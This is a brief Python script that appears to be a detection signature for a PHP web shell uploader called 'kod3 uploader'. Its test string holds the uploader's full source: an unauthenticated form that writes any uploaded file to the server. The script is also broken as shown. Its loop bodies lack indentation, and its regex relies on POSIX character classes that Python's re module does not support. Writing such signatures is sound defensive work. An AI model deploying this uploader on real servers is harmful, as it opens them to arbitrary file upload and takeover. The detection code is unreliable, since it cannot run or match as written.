import re
regex = re.compile(r"^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*['\"]<title>kod3 uploader<\/title>.{0,70}?multipart\/form-data[\"']\s*name=[\"']uploader.{0,240}?\@move_uploaded_file\(\$_files\[[\"']file['\"]\].{0,50}?echo\s*['\"]upload\s*successfully.{0,60}?[[:punct:]\s]+$", flags=re.IGNORECASE | re.DOTALL)
test_str = ("<?php\n\n\n"
"echo \"<title>kod3 Uploader</title>\";\n"
"echo \"<form method='post' enctype='multipart/form-data' name='uploader'>\";\n\n"
"echo '<input type=\"file\" name=\"file\" ><input name=\"upl\" type=\"submit\" id=\"upl\" value=\"Upload\"></form>';\n\n"
"if(isset($_POST['upl'])&&$_POST['upl']== \"Upload\"){\n"
" if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){\n"
" echo 'Upload Successfully ;)<br><br>';\n"
" }else{\n"
" echo 'Upload failed :(<br><br>';\n"
" }\n"
"}\n\n\n"
"?>")
matches = regex.finditer(test_str)
for match_num, match in enumerate(matches, start=1):
print(f"Match {match_num} was found at {match.start()}-{match.end()}: {match.group()}")
for group_num, group in enumerate(match.groups(), start=1):
print(f"Group {group_num} found at {match.start(group_num)}-{match.end(group_num)}: {group}")